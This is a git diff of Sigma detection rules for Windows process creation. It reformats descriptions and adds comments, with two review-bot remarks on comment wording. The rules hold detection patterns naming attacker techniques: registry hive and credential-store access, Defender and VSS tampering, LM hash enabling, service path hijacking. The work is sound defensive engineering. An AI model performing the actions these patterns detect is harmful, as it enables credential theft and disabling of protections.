@@ -1,16 +1,12 @@ title: Enable LM Hash Storage - ProcCreation id: 98dedfdd-8333-49d4-9f23-d7018cccae53 related: - - id: c420410f-c2d8-4010-856b-dffe21866437 - type: similar + - id: c420410f-c2d8-4010-856b-dffe21866437 # Registry + type: similar status: test -description: 'Detects changes to the "NoLMHash" registry value in order to allow Windows - to store LM Hashes. - - By setting this registry value to "0" (DWORD), Windows will be allowed to store - a LAN manager hash of your password in Active Directory and local SAM databases. - - ' +description: | + Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. + By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases. references: - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a - https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password @@ -29,7 +25,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - \System\CurrentControlSet\Control\Lsa - NoLMHash - ' 0' diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_open_command.yml b/sigma/builtin/process_creation/proc_creation_win_reg_open_command.yml index 57404109b..fb10c3b5e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_open_command.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_open_command.yml @@ -1,8 +1,7 @@ title: Suspicious Reg Add Open Command id: dd3ee8cc-f751-41c9-ba53-5a32ed47e563 status: test -description: Threat actors performed dumping of SAM, SECURITY and SYSTEM registry - hives using DelegateExecute key +description: Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key references: - https://thedfirreport.com/2021/12/13/diavol-ransomware/ author: frack113 
@@ -19,21 +18,21 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains|all: + CommandLine|contains|all: - reg - add - hkcu\software\classes\ms-settings\shell\open\command - '/ve ' - /d selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - reg - add - hkcu\software\classes\ms-settings\shell\open\command - /v - DelegateExecute selection_3: - CommandLine|contains|all: + CommandLine|contains|all: - reg - delete - hkcu\software\classes\ms-settings diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_query_registry.yml b/sigma/builtin/process_creation/proc_creation_win_reg_query_registry.yml index 8b057de99..4d0ee720d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_query_registry.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_query_registry.yml @@ -1,9 +1,7 @@ title: Potential Configuration And Service Reconnaissance Via Reg.EXE id: 970007b7-ce32-49d0-a4a4-fbef016950bd status: test -description: Detects the usage of "reg.exe" in order to query reconnaissance information - from the registry. Adversaries may interact with the Windows registry to gather - information about credentials, the system, configuration, and installed software. +description: Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md author: Timur Zinniatullin, oscd.community 
@@ -21,16 +19,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: \reg.exe + - OriginalFileName: reg.exe selection_flag: - CommandLine|contains: query + CommandLine|contains: query selection_key: - CommandLine|contains: + CommandLine|contains: - currentVersion\windows - winlogon\ - currentVersion\shellServiceObjectDelayLoad - - currentVersion\run + - currentVersion\run # Also covers the strings "RunOnce", "RunOnceEx" and "runServicesOnce" - currentVersion\policies\explorer\run - currentcontrolset\services condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml b/sigma/builtin/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml index cfaeda456..a4149b22e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml @@ -1,9 +1,7 @@ title: Potential Tampering With RDP Related Registry Keys Via Reg.EXE id: 0d5675be-bc88-4172-86d3-1e96a4476536 status: test -description: Detects the execution of "reg.exe" for enabling/disabling the RDP service - on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' - values +description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values references: - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport 
@@ -22,20 +20,20 @@ detection: EventID: 4688 Channel: Security selection_main_img: - - NewProcessName|endswith: \reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: \reg.exe + - OriginalFileName: reg.exe selection_main_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' add ' - \CurrentControlSet\Control\Terminal Server - REG_DWORD - ' /f' selection_values_1: - CommandLine|contains|all: + CommandLine|contains|all: - Licensing Core - EnableConcurrentSessions selection_values_2: - CommandLine|contains: + CommandLine|contains: - WinStations\RDP-Tcp - MaxInstanceCount - fEnableWinStation diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_screensaver.yml b/sigma/builtin/process_creation/proc_creation_win_reg_screensaver.yml index 017f44972..f6ccdde73 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_screensaver.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_screensaver.yml @@ -1,13 +1,9 @@ title: Suspicious ScreenSave Change by Reg.exe id: 0fc35fc3-efe6-4898-8a37-0b233339524f status: test -description: 'Adversaries may establish persistence by executing malicious content - triggered by user inactivity. - - Screensavers are programs that execute after a configurable time of user inactivity - and consist of Portable Executable (PE) files with a .scr file extension - - ' +description: | + Adversaries may establish persistence by executing malicious content triggered by user inactivity. + Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md - https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf 
@@ -25,30 +21,30 @@ detection: EventID: 4688 Channel: Security selection_reg: - CommandLine|contains: + CommandLine|contains: - HKEY_CURRENT_USER\Control Panel\Desktop - HKCU\Control Panel\Desktop - NewProcessName|endswith: \reg.exe - selection_option_1: - CommandLine|contains|all: + NewProcessName|endswith: \reg.exe + selection_option_1: # /force Active ScreenSaveActive + CommandLine|contains|all: - /v ScreenSaveActive - /t REG_SZ - /d 1 - /f - selection_option_2: - CommandLine|contains|all: + selection_option_2: # /force set ScreenSaveTimeout + CommandLine|contains|all: - /v ScreenSaveTimeout - /t REG_SZ - '/d ' - /f - selection_option_3: - CommandLine|contains|all: + selection_option_3: # /force set ScreenSaverIsSecure + CommandLine|contains|all: - /v ScreenSaverIsSecure - /t REG_SZ - /d 0 - /f - selection_option_4: - CommandLine|contains|all: + selection_option_4: # /force set a .scr + CommandLine|contains|all: - /v SCRNSAVE.EXE - /t REG_SZ - '/d ' diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_service_imagepath_change.yml b/sigma/builtin/process_creation/proc_creation_win_reg_service_imagepath_change.yml index 2c72eb104..01576404a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_service_imagepath_change.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_service_imagepath_change.yml 
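Review bot: The new inline comment on `selection_option_1` reads `# /force Active ScreenSaveActive`, while the other three options added in the same hunk use the `# /force set <value>` pattern; `selection_option_1: # /force set ScreenSaveActive` keeps the four branches parallel. These comments are the only explanation of why there are four separate `/v` selections, so consistent wording helps a reader scanning the rule.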
@@ -1,16 +1,10 @@ title: Changing Existing Service ImagePath Value Via Reg.EXE id: 9b0b7ac3-6223-47aa-a3fd-e8f211e637db status: test -description: 'Adversaries may execute their own malicious payloads by hijacking the - Registry entries used by services. - - Adversaries may use flaws in the permissions for registry to redirect from the - originally specified executable to one that they control, in order to launch their - own code at Service start. - +description: | + Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. + Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe author: frack113 @@ -27,13 +21,13 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'add ' - SYSTEM\CurrentControlSet\Services\ - ' ImagePath ' - NewProcessName|endswith: \reg.exe + NewProcessName|endswith: \reg.exe selection_value: - CommandLine|contains: + CommandLine|contains: - ' /d ' - ' -d ' condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_software_discovery.yml b/sigma/builtin/process_creation/proc_creation_win_reg_software_discovery.yml index 43f517261..be6e7ca26 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_software_discovery.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_software_discovery.yml 
@@ -1,15 +1,13 @@ title: Detected Windows Software Discovery id: e13f668e-7f95-443d-98d2-1816a7648a7b related: - - id: 2650dd1a-eb2a-412d-ac36-83f06c4f2282 - type: derived + - id: 2650dd1a-eb2a-412d-ac36-83f06c4f2282 + type: derived status: test -description: Adversaries may attempt to enumerate software for a variety of reasons, - such as figuring out what security measures are present or if the compromised - system has a version of software that is vulnerable. +description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md - - https://github.com/harleyQu1nn/AggressorScripts + - https://github.com/harleyQu1nn/AggressorScripts # AVQuery.cna author: Nikita Nazarov, oscd.community date: 2020/10/16 modified: 2022/10/09 @@ -24,12 +22,12 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - query - \software\ - /v - svcversion - NewProcessName|endswith: \reg.exe + NewProcessName|endswith: \reg.exe condition: process_creation and selection falsepositives: - Legitimate administration activities diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_susp_paths.yml b/sigma/builtin/process_creation/proc_creation_win_reg_susp_paths.yml index 218099140..3a9aab61b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_susp_paths.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_susp_paths.yml 
@@ -1,8 +1,7 @@ title: Reg Add Suspicious Paths id: b7e2a8d4-74bb-4b78-adc9-3f92af2d4829 status: test -description: Detects when an adversary uses the reg.exe utility to add or modify new - keys or subkeys +description: Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md @@ -22,10 +21,11 @@ detection: EventID: 4688 Channel: Security selection_reg: - - NewProcessName|endswith: \reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: \reg.exe + - OriginalFileName: reg.exe selection_path: - CommandLine|contains: + CommandLine|contains: + # Add more suspicious registry locations below - \AppDataLow\Software\Microsoft\ - \Policies\Microsoft\Windows\OOBE - \Policies\Microsoft\Windows NT\CurrentVersion\Winlogon diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_volsnap_disable.yml b/sigma/builtin/process_creation/proc_creation_win_reg_volsnap_disable.yml index 4435776b2..8b3b94738 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_volsnap_disable.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_volsnap_disable.yml @@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - \Services\VSS\Diag - /d Disabled condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_windows_defender_tamper.yml b/sigma/builtin/process_creation/proc_creation_win_reg_windows_defender_tamper.yml index f81b03666..72c90d546 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_windows_defender_tamper.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_windows_defender_tamper.yml 
@@ -1,15 +1,12 @@ title: Suspicious Windows Defender Registry Key Tampering Via Reg.EXE id: 452bce90-6fb0-43cc-97a5-affc283139b3 status: experimental -description: Detects the usage of "reg.exe" to tamper with different Windows Defender - registry keys in order to disable some important features related to protection - and detection +description: Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection references: - https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/ - https://github.com/swagkarna/Defeat-Defender-V1.2.0 - https://www.elevenforum.com/t/video-guide-how-to-completely-disable-microsoft-defender-antivirus.14608/page-2 -author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali - (Nextron Systems) +author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) date: 2022/03/22 modified: 2023/06/05 tags: @@ -23,18 +20,18 @@ detection: EventID: 4688 Channel: Security selection_root_img: - - NewProcessName|endswith: \reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: \reg.exe + - OriginalFileName: reg.exe selection_root_path: - CommandLine|contains: + CommandLine|contains: - SOFTWARE\Microsoft\Windows Defender\ - SOFTWARE\Policies\Microsoft\Windows Defender Security Center - SOFTWARE\Policies\Microsoft\Windows Defender\ selection_dword_0: - CommandLine|contains|all: + CommandLine|contains|all: - ' add ' - d 0 - CommandLine|contains: + CommandLine|contains: - DisallowExploitProtectionOverride - EnableControlledFolderAccess - MpEnablePus 
@@ -43,10 +40,10 @@ detection: - SubmitSamplesConsent - TamperProtection selection_dword_1: - CommandLine|contains|all: + CommandLine|contains|all: - ' add ' - d 1 - CommandLine|contains: + CommandLine|contains: - DisableAntiSpyware - DisableAntiSpywareRealtimeProtection - DisableAntiVirus diff --git a/sigma/builtin/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml b/sigma/builtin/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml index bb4adaa42..2b9f0857d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml +++ b/sigma/builtin/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml @@ -1,9 +1,7 @@ title: Write Protect For Storage Disabled id: 75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13 status: test -description: Looks for changes to registry to disable any write-protect property for - storage devices. This could be a precursor to a ransomware attack and has been - an observed technique used by cypherpunk group. +description: Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group. author: Sreeman date: 2021/06/11 modified: 2023/12/15 @@ -18,11 +16,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - \System\CurrentControlSet\Control - Write Protection - '0' - CommandLine|contains: + CommandLine|contains: - storage - storagedevicepolicies condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml b/sigma/builtin/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml index b282daab7..334cf3034 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml 
+++ b/sigma/builtin/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml @@ -1,11 +1,10 @@ title: Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension id: e9f8f8cc-07cc-4e81-b724-f387db9175e4 related: - - id: cc368ed0-2411-45dc-a222-510ace303cb2 - type: derived + - id: cc368ed0-2411-45dc-a222-510ace303cb2 + type: derived status: test -description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities - with an uncommon extension. +description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension. references: - https://www.fortiguard.com/threat-signal-report/4718?s=09 - https://lolbas-project.github.io/lolbas/Binaries/Regasm/ @@ -23,14 +22,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \Regsvcs.exe - - \Regasm.exe - - OriginalFileName: - - RegSvcs.exe - - RegAsm.exe + - NewProcessName|endswith: + - \Regsvcs.exe + - \Regasm.exe + - OriginalFileName: + - RegSvcs.exe + - RegAsm.exe selection_extension: - CommandLine|contains: + CommandLine|contains: + # Note: Add more potentially uncommon extensions - .dat - .gif - .jpeg diff --git a/sigma/builtin/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml b/sigma/builtin/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml index 619b3d69d..81fe1817f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml 
@@ -1,11 +1,10 @@ title: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location id: cc368ed0-2411-45dc-a222-510ace303cb2 related: - - id: e9f8f8cc-07cc-4e81-b724-f387db9175e4 - type: derived + - id: e9f8f8cc-07cc-4e81-b724-f387db9175e4 + type: derived status: test -description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities - from a potentially suspicious location +description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location references: - https://www.fortiguard.com/threat-signal-report/4718?s=09 - https://lolbas-project.github.io/lolbas/Binaries/Regasm/ @@ -24,19 +23,22 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \Regsvcs.exe - - \Regasm.exe - - OriginalFileName: - - RegSvcs.exe - - RegAsm.exe + - NewProcessName|endswith: + - \Regsvcs.exe + - \Regasm.exe + - OriginalFileName: + - RegSvcs.exe + - RegAsm.exe selection_dir: - CommandLine|contains: + CommandLine|contains: + # Note: Add more potentially suspicious directories - \AppData\Local\Temp\ - \Microsoft\Windows\Start Menu\Programs\Startup\ - \PerfLogs\ - \Users\Public\ - \Windows\Temp\ + # - '\Desktop\' + # - '\Downloads\' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_regedit_export_critical_keys.yml b/sigma/builtin/process_creation/proc_creation_win_regedit_export_critical_keys.yml index ae20d1daf..e763a2954 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regedit_export_critical_keys.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regedit_export_critical_keys.yml 
@@ -1,8 +1,8 @@ title: Exports Critical Registry Keys To a File id: 82880171-b475-4201-b811-e9c826cd5eaa related: - - id: f0e53e89-8d22-46ea-9db5-9d4796ee2f8a - type: similar + - id: f0e53e89-8d22-46ea-9db5-9d4796ee2f8a + type: similar status: test description: Detects the export of a crital Registry key to a file. references: @@ -22,18 +22,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \regedit.exe - - OriginalFileName: REGEDIT.EXE + - NewProcessName|endswith: \regedit.exe + - OriginalFileName: REGEDIT.EXE selection_cli_1: - CommandLine|contains: + CommandLine|contains: - ' /E ' - ' -E ' selection_cli_2: - CommandLine|contains: + CommandLine|contains: - hklm - hkey_local_machine selection_cli_3: - CommandLine|endswith: + CommandLine|endswith: - \system - \sam - \security diff --git a/sigma/builtin/process_creation/proc_creation_win_regedit_export_keys.yml b/sigma/builtin/process_creation/proc_creation_win_regedit_export_keys.yml index 28562f91d..cd6b5e0c7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regedit_export_keys.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regedit_export_keys.yml @@ -1,8 +1,8 @@ title: Exports Registry Key To a File id: f0e53e89-8d22-46ea-9db5-9d4796ee2f8a related: - - id: 82880171-b475-4201-b811-e9c826cd5eaa - type: similar + - id: 82880171-b475-4201-b811-e9c826cd5eaa + type: similar status: test description: Detects the export of the target Registry key to a file. references: 
@@ -22,18 +22,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \regedit.exe - - OriginalFileName: REGEDIT.EXE + - NewProcessName|endswith: \regedit.exe + - OriginalFileName: REGEDIT.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /E ' - ' -E ' - filter_1: - CommandLine|contains: + filter_1: # filters to avoid intersection with critical keys rule + CommandLine|contains: - hklm - hkey_local_machine filter_2: - CommandLine|endswith: + CommandLine|endswith: - \system - \sam - \security diff --git a/sigma/builtin/process_creation/proc_creation_win_regedit_import_keys.yml b/sigma/builtin/process_creation/proc_creation_win_regedit_import_keys.yml index b41f5767b..e8fda82a8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regedit_import_keys.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regedit_import_keys.yml @@ -1,8 +1,8 @@ title: Imports Registry Key From a File id: 73bba97f-a82d-42ce-b315-9182e76c57b1 related: - - id: 0b80ade5-6997-4b1d-99a1-71701778ea61 - type: similar + - id: 0b80ade5-6997-4b1d-99a1-71701778ea61 + type: similar status: test description: Detects the import of the specified file to the registry with regedit.exe. references: @@ -22,15 +22,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \regedit.exe - - OriginalFileName: REGEDIT.EXE + - NewProcessName|endswith: \regedit.exe + - OriginalFileName: REGEDIT.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /i ' - ' /s ' - .reg filter_1: - CommandLine|contains: + CommandLine|contains: - ' /e ' - ' /a ' - ' /c ' @@ -38,7 +38,7 @@ detection: - ' -a ' - ' -c ' filter_2: - CommandLine|re: :[^ \\] + CommandLine|re: :[^ \\] # to avoid intersection with ADS rule condition: process_creation and (all of selection_* and not all of filter_*) fields: - ParentProcessName 
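Review bot: The new comments `# filters to avoid intersection with critical keys rule` (filter_1 in the export_keys hunk) and `# to avoid intersection with ADS rule` (filter_2 in the last import_keys hunk) name the sibling rule only in prose, whereas regini_execution later in this same patch cites the rule id (`# Covered in 77946e79-…`). Referencing the ids already listed under each file's `related:` — `82880171-b475-4201-b811-e9c826cd5eaa` for the critical-keys rule and `0b80ade5-6997-4b1d-99a1-71701778ea61` for the ADS rule — would make the cross-reference unambiguous and greppable. The export_keys `condition:` line that applies filter_1 is outside its hunk.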
diff --git a/sigma/builtin/process_creation/proc_creation_win_regedit_import_keys_ads.yml b/sigma/builtin/process_creation/proc_creation_win_regedit_import_keys_ads.yml index 0cb03690e..00f315d7f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regedit_import_keys_ads.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regedit_import_keys_ads.yml @@ -1,8 +1,8 @@ title: Imports Registry Key From an ADS id: 0b80ade5-6997-4b1d-99a1-71701778ea61 related: - - id: 73bba97f-a82d-42ce-b315-9182e76c57b1 - type: similar + - id: 73bba97f-a82d-42ce-b315-9182e76c57b1 + type: similar status: test description: Detects the import of a alternate datastream to the registry with regedit.exe. references: @@ -22,15 +22,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \regedit.exe - - OriginalFileName: REGEDIT.EXE + - NewProcessName|endswith: \regedit.exe + - OriginalFileName: REGEDIT.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /i ' - .reg - CommandLine|re: :[^ \\] + CommandLine|re: :[^ \\] filter: - CommandLine|contains: + CommandLine|contains: - ' /e ' - ' /a ' - ' /c ' diff --git a/sigma/builtin/process_creation/proc_creation_win_regedit_trustedinstaller.yml b/sigma/builtin/process_creation/proc_creation_win_regedit_trustedinstaller.yml index c21846a4f..aff947aab 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regedit_trustedinstaller.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regedit_trustedinstaller.yml @@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \regedit.exe + NewProcessName|endswith: \regedit.exe ParentProcessName|endswith: - \TrustedInstaller.exe - \ProcessHacker.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_regini_ads.yml b/sigma/builtin/process_creation/proc_creation_win_regini_ads.yml index 4c7c424a0..e68823886 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_regini_ads.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regini_ads.yml @@ -1,11 +1,10 @@ title: Suspicious Registry Modification From ADS Via Regini.EXE id: 77946e79-97f1-45a2-84b4-f37b5c0d8682 related: - - id: 5f60740a-f57b-4e76-82a1-15b6ff2cb134 - type: derived + - id: 5f60740a-f57b-4e76-82a1-15b6ff2cb134 + type: derived status: test -description: Detects the import of an alternate data stream with regini.exe, regini.exe - can be used to modify registry keys. +description: Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys. references: - https://lolbas-project.github.io/lolbas/Binaries/Regini/ - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f @@ -24,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \regini.exe - - OriginalFileName: REGINI.EXE + - NewProcessName|endswith: \regini.exe + - OriginalFileName: REGINI.EXE selection_re: - CommandLine|re: :[^ \\] + CommandLine|re: :[^ \\] condition: process_creation and (all of selection_*) fields: - ParentProcessName diff --git a/sigma/builtin/process_creation/proc_creation_win_regini_execution.yml b/sigma/builtin/process_creation/proc_creation_win_regini_execution.yml index d2af9e4c9..0ced30d13 100644 --- a/sigma/builtin/process_creation/proc_creation_win_regini_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_regini_execution.yml 
@@ -1,11 +1,10 @@ title: Registry Modification Via Regini.EXE id: 5f60740a-f57b-4e76-82a1-15b6ff2cb134 related: - - id: 77946e79-97f1-45a2-84b4-f37b5c0d8682 - type: derived + - id: 77946e79-97f1-45a2-84b4-f37b5c0d8682 + type: derived status: test -description: Detects the execution of regini.exe which can be used to modify registry - keys, the changes are imported from one or more text files. +description: Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files. references: - https://lolbas-project.github.io/lolbas/Binaries/Regini/ - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f @@ -24,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \regini.exe - - OriginalFileName: REGINI.EXE + - NewProcessName|endswith: \regini.exe + - OriginalFileName: REGINI.EXE filter: - CommandLine|re: :[^ \\] + CommandLine|re: :[^ \\] # Covered in 77946e79-97f1-45a2-84b4-f37b5c0d8682 condition: process_creation and (selection and not filter) fields: - ParentProcessName diff --git a/sigma/builtin/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml b/sigma/builtin/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml index 35c45caec..5c91502a7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml +++ b/sigma/builtin/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml @@ -19,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - -path - dll - NewProcessName|endswith: \register-cimprovider.exe + NewProcessName|endswith: \register-cimprovider.exe condition: process_creation and selection fields: - CommandLine 
diff --git a/sigma/builtin/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml b/sigma/builtin/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml index cd714c376..03e96c7f0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml +++ b/sigma/builtin/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml @@ -1,11 +1,10 @@ title: Enumeration for 3rd Party Creds From CLI id: 87a476dc-0079-4583-a985-dee7a20a03de related: - - id: e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1 - type: derived + - id: e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1 + type: derived status: test -description: Detects processes that query known 3rd party registry keys that holds - credentials via commandline +description: Detects processes that query known 3rd party registry keys that holds credentials via commandline references: - https://isc.sans.edu/diary/More+Data+Exfiltration/25698 - https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt @@ -24,7 +23,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: # Add more paths as they are discovered - \Software\SimonTatham\PuTTY\Sessions - \Software\\SimonTatham\PuTTY\SshHostKeys\ - \Software\Mobatek\MobaXterm\ diff --git a/sigma/builtin/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml b/sigma/builtin/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml index 206c5ab28..705f9f757 100644 --- a/sigma/builtin/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml +++ b/sigma/builtin/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml 
